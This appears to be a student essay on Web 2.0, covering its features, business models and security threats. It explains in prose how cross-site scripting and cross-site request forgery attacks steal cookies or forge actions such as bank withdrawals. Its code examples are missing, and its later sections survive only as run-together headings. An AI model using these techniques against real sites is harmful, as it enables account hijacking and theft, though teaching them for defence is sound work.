Abstract

Web 2.0 is second generation of internet. It brings evolutions to online community in many aspects, such as participation, collaboration, socialization and so on. Apart from influencing individuals, enterprises are also immersed in this technology development. Web 2.0 brings opportunities to build a new business model rather than traditional marketing approaches. It is ignited by many internet technology giants, such as Google, YouTube, Wiki, Flickr and etc. on the other hand, security becomes more critical than ever before. This project is aimed to identify the impact of Web 2.0, present vulnerability respect to new features of it, demonstrate possible types of attack, and discuss existing mature approaches to against security threats. Some author’s original concepts of internet application development will be elaborated.

Introduction to Web 2.0Origin of Web 2.0

People have different perspectives of web 2.0 since the birth of this concept. Some agree sharing is the most prominent feature of web 2.0, while the others point out collaboration is a great step in internet evolution. To clarify what is web 2.0, a web 2.0 conference session between O’Reilly and MediaLive International is held in late 2004, it consolidated seven characteristic of web 2.0:

The Web As Platform

Harnessing Collective Intelligence

Data is the Next Intel Inside

End of the Software Release Cycle

Lightweight Programming Models

Software Above the Level of a Single Device

Rich User Experiences

These concepts are based on the observation of companies survived the economic collapse. From these, Dale Dougherty, a web pioneer pointed out web would become more important than ever(Oreilly, 2007). Moreover, these concepts lead to the definition of web 2.0. Meanwhile, the internet technology companies with these characteristics achieved great success.

Performance of Some Web 2.0 Gaint

"Facebook was not originally created to be a company. It was built to accomplish a social mission — to make the world more open and connected."

– Mark Zuckerberg in a letter ahead of Facebook’s IPO filing / February 01, 2012

Facebook is one of the typical web 2.0 sites. It serves people social networking needs. Its active users grow from 100 million in Aug 2008, to 1000 million in 4 years. Table1-1 illustrates its rapid expansion until Oct 2012.

Table 1 Facebook User Growth

While Facebook drew people’s attention, the other web 2.0 sites also showed excellent performance in many areas, such as YouTube, it is estimated 60 hours of new videos is uploaded in every minutes, it has eight hundred million unique users a month, and it is ranked the third most visit site by 2012. Absolutely, internet giant Google is the most certainly the standard bearer of web 2.0. It provides services to end user rather than selling software. However, users pay directly or indirectly for these services, and it occupies the biggest portion of search engine market. Table 1-2 shows the share of UK search engine market, and Google owns 90.84 per cent of the users, while yahoo has only 3.15 per cent.

Figure 1 UK Search Engine Market Share

In conclusion, web 2.0 brings us great impact in many ways. Once you surf internet, you might be acting as a participant or contributor of web 2.0.

Features of Web 2.0

Apart from web 2.0’s influence, we might be interested to explore the features of this buzzword. Extend concepts of web 2.0 from Tim O’Reilly, there are seven factors(Oreilly, 2007):

Folksonomy : Free Classification of Information

Rich User Experience

User as a Contributor

Long Tail

User Participation

Basic Trust

Dispersion

We explain some most popular items here. First is Folksonomy, it talks about collaborative classification, and it is often referred as tagging. Such as Flickr, it provides the flexibility of freely choosing keywords. Next interesting feature might be user participation, such as Amazon, it provides a space for customers put their review, and it even use these user activity to produce better search result. Last is Long tail, it might be a new word to readers, but it has huge effect on internet commerce, such as Google, it makes use of collective power of the small sites to increase profit.

Online Retail, a Web 2.0 Business Model

"Facebook has more than 800 million users. More than 50% log in everyday", Mary Meeker said in web 2.0 summit 2011. This reflects user behaviours and blooming of internet industry. Here we will investigate some web 2.0 business model.

There are seven business models, they are online retail, advertising supported, subscription model, download fees, affiliate marketing, software as a service, and brokerage or intermediary(Funk, 2008). Here we focus on online retail only. It is also called Ecommerce. Ecommerce plays havoc with some brick-and-mortar retailers. Because no one can anticipate how market goes, so it is not easy to satisfy broad demand. However, Ecommerce can easily adapt to these requirements, such as Amazon, it provide broad range of product, such as books, music cd, and movie etc. On the other hand, Ecommerce treat small business very kind. Mom-and-pops could be discovered by customer from far and wide area. This phenomenon strongly associated with "Long Tail", one of the features we have mentioned earlier. Because Web 2.0 provides us enormous choices of inventories, we are not restricted to any particular local store. Furthermore, we can make use of another advantage of Web 2.0 is user participation. This helps improve traditional ecommerce website in terms of lack warmth and lack interaction.

But no technology is flawless. Security threats to web 2.0 are becoming crucial, since it could damage the reputation, trust and so on.

Web 2.0 Security ThreatsWeb 2.0 Worsens the Security?

The answer to this section title is probably YES. In Web 1.0, as long as you did not launch any executable or open any suspicious attachment, you won’t be infected by any virus. Now, malicious codes can execute themselves when you visit some webpages.

Meanwhile, Web 2.0 requires more interactive technology, such as widgets, applet and other add-on, Flash and shockwave might be one of the well-known multimedia players. However, we have to be more vigilant when we are prompt to install some plugin, since many of us are not cybercrime expert, and do not have enough knowledge to identify if the software is harmful to our system.

Recent Cybercrimes

In the time of Web 2.0, there are variant cybercrime types. One of most frequent attack flaw could be cross site scripting. Table 2-1 depicts the percentage of different cybercrime categories in Q3 2012. It shows cross site scripting is the most severe threat with 35 per cent, and 76% of cases happens in North America and 16% in Southern Asia. It followed by cross site request forgery of 29% and directory traversal of 24%. The lightest is SQL injection with 12%. This report is based on 15 million attacks blocked by FireHost servers in the US and Europe during Q3 2012. Moreover, "Cross-site attacks are a severe threat to business operations, especially if servers aren’t properly prepared," Chris Hinkley said.

Figure 2 Cybercrime statistic by FireHost Report 2012

Challenges to Business Organization

Social networking website, such as twitter and Facebook, showed intense customer engagement and creativity. Some companies are aware of these features, and keen to deploy web 2.0 solutions in order to increase productivity. Productivity might be increasing significantly by highest degree of user participation, and lightest technology investment. On the other hand, some company restrict the usage of these new technology stuff such as Facebook, their primary concern is data leaks and security risks. Table 2-2 shows the security concerns of company leaders. Malware introduction is the most worry item, while virus introduction follows.

Figure 2 Top security threat concern

Existing Security Issues

In this section, we will discuss security issues come with web 2.0. You should not be surprise if any cybercrime described here is similar to what we knew since birth of WWW. Because, along with internet technology are improving, cybercrime evolves respect to the new features, and even make use of new technologies.

Secure Enterprise 2.0 Forum, in 2009, has identified the top Web 2.0 security vulnerabilities as follows:

Insufficient Authentication Controls

Cross Site Scripting (XSS)

Cross Site Request Forgery (CSRF)

Phishing

Information Leakage

Injection Flaws

Information Integrity

Insufficient Anti-automation

Here we will focus on Cross Site Scripting and Cross Site Request Forgery only. Attacking mechanism and real scenario will be introduced.

Cross Site Scripting

As we see earlier, cross site scripting is the top harmful threat in Q3 2012. Why it works in web 2.0 and how it works may interest us most.

First, XSS is not new. Many website are compromised to this kind of attack. If the application supports javascript, it opens the door to a hacker to steal your identity or account. Recent burst of content writing increased the chance to exploit XSS vulnerability. For example, a hacker can inject malicious code in a blog, social networking site or wiki. When the scripts are loaded into your browser, and executed, based on current DOM context, this malicious code can retrieve critical information from cookies, such as banking, trading etc. Figure 2-3 illustrate sequence diagram of an attacker make use of malicious script to hijack a user’s account.

Cookie theft and account hijacking

Figure 2 Sequence Diagram for XSS

Let us consider a simplest mechanism. There is a website with following index page

Attacker could craft a URL as follow and send to some victim.

In this example victim’s browser would execute the script echo $name, except annoying "attacked" popup, no other damage happen. However, a real hacker could make use of this vulnerability to do more. Now we can summarize this attack, when a user provide data through HTTP query parameter, and server script display it to user without validating the data format, echoed script might be used to collect user identity. This is also called non-persistent XSS.

Moreover, persistent XSS can cause more devastating effect. This occurs as server keeps the unusual data without validating. So when a user browses an innocent-looking page, the malicious code might be load silently and execute behind. Suppose a dating website, for security concern, it hides member’s name and email. However, an attacker could inject his own script by answer some question, such as "describe ideal dating place". So later when anyone visits "her" profile, the browser will execute the script automatically and send the name and email to the attacker.

There are several reasons web 2.0 evolving the XSS threat, most fundamental one is web 2.0 levers DOM based entry point. Based on this, there three major factors dominate XSS with regard to web 2.0 applications: dynamic DOM manipulation, dynamic script execution, and event-driven XSS in DOM(Shah, 2008). Below explained how these factors coordinate each other to compromise security.

As user, we do intend to minimize our page reloading and refreshing. Developer achieves this by heavily relying on updating part of DOM content. An attacker can look into script, and determine the key data consumed and identify how to make use of these calls. Until now, we can say these leaks the chance to attacker to inject their malicious code. We can see a specific attack as follow: a website parses query string and makes use of parsing data and eval it in script.

And attacker can notice this, and frame a URL as below

If a victim is enticed to click above link, since the routine contains eval statement execute information originate from various resource, and does not take care input, it gives the opportunity to execute a dynamic script. XSS is able to successfully to execute the alert. An attacker could be clever than we think, he can even inject malicious code into incoming stream, and the harmful script then wait for you to fire them. We can see XSS is against the Web 2.0 scripting feature.

Cross Site Request Forgery

Apart from XSS, Cross site request forgery is next highest rate of attack. It occurs when a malicious website cause victim’s browser performs some unwanted action to some trusted site, such as transfer money, harvest email, violate user privacy and compromise user account. These attacks did not raise the attention of developers or security community, since many of them believe defences against XSS also protect from CSRF(Zeller & Felten, 2008). However, it is not true. We will look into how CSRF work in this section.

Let us look into a scenario, a chat forum member Alice always browse forum and check bank account in some period, some attacker realize this pattern, he or she could craft a HTML image tag as follow:

And then post this in a chat forum. Once Alice browse the forum, her browser attempt to load the image, meanwhile, the cookies which stores the session respect to bank has not expired, a withdrawer action might be performed successfully.

One of Web 2.0 technology frameworks is Ajax, web 2.0 applications can make use of XmlHttpRequest to communicate with backend server. This operation often goes in stealthy mode. Fortunately, browser enforce security in XHR to prevent cross site request, but If an attacker can identify XSS, then he or she is still possible to compromise a specific account(Shah, 2008). Below is a scenario how an attacker can achieve CSRF.

Suppose a victim try to place some order to a specific website through an Ajax call. Ajax might make use of following XML stream to send this request

Attacker can observe victim’s HTTP request as following

Attacker can easily achieve the same HTTP request through a traditional static page like following:

HTTP request generated from above is almost identical to the request generated from Ajax. There is indeed a subtle difference, which is content type will not be the same, the latter content type is specified in a HTTP request as plain text. However, if a server does not take care of this difference, it opens the door to an attacker to mimic normal transaction.

Case studies with Recent AttacksPotential Security RisksStudy of Web 2.0 VulnerabilityPossible Types of Attack In The FutureHow to protect against Web 2.0 ThreatsAntivirus software Versus Web 2.0 ThreatsTechnical Approaches to DeveloperRelationship Based Access ControlAnti-CSRF with Token and MoreWays to Secure Our Working EnvironmentCase studies: How to avoid Facebook DisasterFurther Study on Web 2.0 SecurityDescribe a Secured Web 2.0 ModelPossible Web 2.0 Development StrategyWeb 2.0 and Future OutlookWeb 2.0: End or New LifeWeb 3.0 and Security 3.0Appendix and List of Figures

Article name: Origin Of Web 2 Computer Science essay, research paper, dissertation

Make Assignments Great Again

24/7 customer support: science/70883-origin-of-web-2-computer-science.html